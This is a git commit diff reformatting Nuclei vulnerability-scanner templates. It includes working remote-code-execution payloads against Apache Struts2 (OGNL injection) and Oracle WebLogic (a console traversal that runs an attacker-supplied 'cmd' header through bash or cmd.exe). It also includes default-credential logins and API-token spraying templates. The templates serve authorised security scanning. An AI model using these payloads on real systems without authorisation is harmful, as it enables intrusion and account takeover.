commit
a21cec6362
|
@ -14,8 +14,3 @@ tags:
|
||||||
|
|
||||||
# files is a list of files to ignore template execution
|
# files is a list of files to ignore template execution
|
||||||
# unless asked for by the user.
|
# unless asked for by the user.
|
||||||
|
|
||||||
files:
|
|
||||||
- "token-spray/"
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -11,25 +11,19 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
params:
|
params:
|
||||||
|
@ -40,11 +34,12 @@ requests:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
condition: or
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- 400
|
- 400
|
||||||
condition: or
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||||
part: body
|
|
||||||
|
|
|
@ -91,15 +91,16 @@ requests:
|
||||||
- webviewer
|
- webviewer
|
||||||
- welcome
|
- welcome
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "environment variable"
|
- "environment variable"
|
||||||
- "display library search paths"
|
- "display library search paths"
|
||||||
condition: and
|
|
||||||
|
|
|
@ -22,14 +22,16 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
ids: helpers/wordlists/numbers.txt
|
ids: helpers/wordlists/numbers.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Dashboard</title>"
|
- "<title>Dashboard</title>"
|
||||||
|
|
|
@ -28,8 +28,7 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
cmd: §exec§
|
cmd: {{exec}}
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||||
|
|
||||||
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
||||||
|
@ -41,12 +40,12 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
condition: or
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
- "\\[(font|extension|file)s\\]"
|
- "\\[(font|extension|file)s\\]"
|
||||||
condition: or
|
|
||||||
part: body
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -31,11 +31,12 @@ requests:
|
||||||
command:
|
command:
|
||||||
- "systeminfo" # Windows
|
- "systeminfo" # Windows
|
||||||
- "lsb_release -a" # Linux
|
- "lsb_release -a" # Linux
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
condition: or
|
||||||
regex:
|
regex:
|
||||||
- "OS Name:.*Microsoft Windows"
|
- "OS Name:.*Microsoft Windows"
|
||||||
- "Distributor ID:"
|
- "Distributor ID:"
|
||||||
|
|
|
@ -22,6 +22,8 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
|
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
|
||||||
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
|
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: grafana-default-login
|
id: grafana-default-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Grafana Default Login
|
name: Grafana Default Login
|
||||||
author: pdteam
|
author: pdteam
|
||||||
|
@ -26,7 +27,6 @@ requests:
|
||||||
username:
|
username:
|
||||||
- admin
|
- admin
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
password:
|
password:
|
||||||
- prom-operator
|
- prom-operator
|
||||||
- admin
|
- admin
|
||||||
|
@ -35,15 +35,13 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- grafana_session
|
- "grafana_session" # Login cookie
|
||||||
part: header
|
part: header
|
||||||
# Check for 'grafana_session' cookie on valid login in the response header.
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- Logged in
|
|
||||||
part: body
|
part: body
|
||||||
# Check for valid string on valid login.
|
words:
|
||||||
|
- "Logged in" # Logged in keyword
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -20,15 +20,13 @@ requests:
|
||||||
username:
|
username:
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
||||||
- '"error": ""'
|
- '"error": ""'
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -18,22 +18,21 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
password:
|
password:
|
||||||
- 12345
|
- "12345"
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "session_id="
|
- "session_id="
|
||||||
- "resource"
|
- "resource"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- "Invalid Password"
|
|
||||||
part: body
|
part: body
|
||||||
negative: true
|
negative: true
|
||||||
|
words:
|
||||||
|
- "Invalid Password"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -23,17 +23,17 @@ requests:
|
||||||
payloads:
|
payloads:
|
||||||
path: helpers/wordlists/adminer-paths.txt
|
path: helpers/wordlists/adminer-paths.txt
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "- Adminer</title>"
|
- "- Adminer</title>"
|
||||||
- "partial(verifyVersion, "
|
- "partial(verifyVersion"
|
||||||
condition: and
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -14,12 +14,10 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Accept-Language: en-US,en;q=0.9
|
Accept-Language: en-US,en;q=0.9
|
||||||
Connection: close
|
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
mdbPaths: helpers/wordlists/mdb-paths.txt
|
mdbPaths: helpers/wordlists/mdb-paths.txt
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: prestashop-module-fuzz
|
id: prestashop-module-fuzz
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Prestashop Modules Enumeration
|
name: Prestashop Modules Enumeration
|
||||||
author: meme-lord
|
author: meme-lord
|
||||||
|
@ -16,19 +17,18 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
path: helpers/wordlists/prestashop-modules.txt
|
path: helpers/wordlists/prestashop-modules.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "<module>"
|
- "<module>"
|
||||||
- "<name>"
|
- "<name>"
|
||||||
- "<displayName>"
|
- "<displayName>"
|
||||||
- "<is_configurable>"
|
- "<is_configurable>"
|
||||||
- "</module>"
|
- "</module>"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: wordpress-plugins-detect
|
id: wordpress-plugins-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Plugins Detection
|
name: WordPress Plugins Detection
|
||||||
author: 0xcrypto
|
author: 0xcrypto
|
||||||
|
@ -13,11 +14,8 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 1
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: wordpress-themes-detect
|
id: wordpress-themes-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Theme Detection
|
name: WordPress Theme Detection
|
||||||
author: 0xcrypto
|
author: 0xcrypto
|
||||||
|
@ -13,11 +14,8 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
themeSlug: helpers/wordlists/wordpress-themes.txt
|
themeSlug: helpers/wordlists/wordpress-themes.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 1
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
path:
|
path:
|
||||||
- /
|
- /
|
||||||
|
@ -63,9 +64,6 @@ requests:
|
||||||
- /webticket/webticketservice.svcabs/
|
- /webticket/webticketservice.svcabs/
|
||||||
- /adfs/services/trust/2005/windowstransport
|
- /adfs/services/trust/2005/windowstransport
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -1,15 +1,19 @@
|
||||||
## About
|
## About
|
||||||
|
|
||||||
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
|
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
|
|
||||||
|
|
||||||
```bash
|
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
|
||||||
# Run Nuclei specifying all the api templates:
|
|
||||||
|
|
||||||
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
|
```console
|
||||||
|
# Running token-spray templates against a single token to test
|
||||||
|
nuclei -t token-spray/ -var token=random-token-to-test
|
||||||
|
|
||||||
|
# Running token-spray templates against a file containing multiple new line delimited tokens
|
||||||
|
nuclei -t token-spray/ -var token=file_with_tokens.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Credits
|
## Credits
|
||||||
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
|
||||||
|
|
||||||
|
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,asana
|
tags: token-spray,asana
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
@ -16,6 +17,6 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
negative: true
|
||||||
status:
|
status:
|
||||||
- 401
|
- 401
|
||||||
negative: true
|
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,bing,maps,bingmaps
|
tags: token-spray,bing,maps,bingmaps
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,bitly
|
tags: token-spray,bitly
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,buildkite
|
tags: token-spray,buildkite
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,buttercms
|
tags: token-spray,buttercms
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,calendly
|
tags: token-spray,calendly
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,circle,circleci
|
tags: token-spray,circle,circleci
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,deviantart
|
tags: token-spray,deviantart
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,dropbox
|
tags: token-spray,dropbox
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,github
|
tags: token-spray,github
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,autocomplete
|
tags: token-spray,google,autocomplete
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search
|
tags: token-spray,google,search
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,directions
|
tags: token-spray,google,directions
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,elevation
|
tags: token-spray,google,elevation
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,fcm,firebase,cloud,messaging
|
tags: token-spray,google,fcm,firebase,cloud,messaging
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,find,text
|
tags: token-spray,google,find,text
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,distance,matrix
|
tags: token-spray,google,distance,matrix
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,geocode
|
tags: token-spray,google,geocode
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,19 +6,21 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,geolocation
|
tags: token-spray,google,geolocation
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
|
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
|
||||||
matchers-condition: and
|
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
negative: true
|
||||||
words:
|
words:
|
||||||
- 'error'
|
- 'error'
|
||||||
negative: true
|
|
||||||
- type: status
|
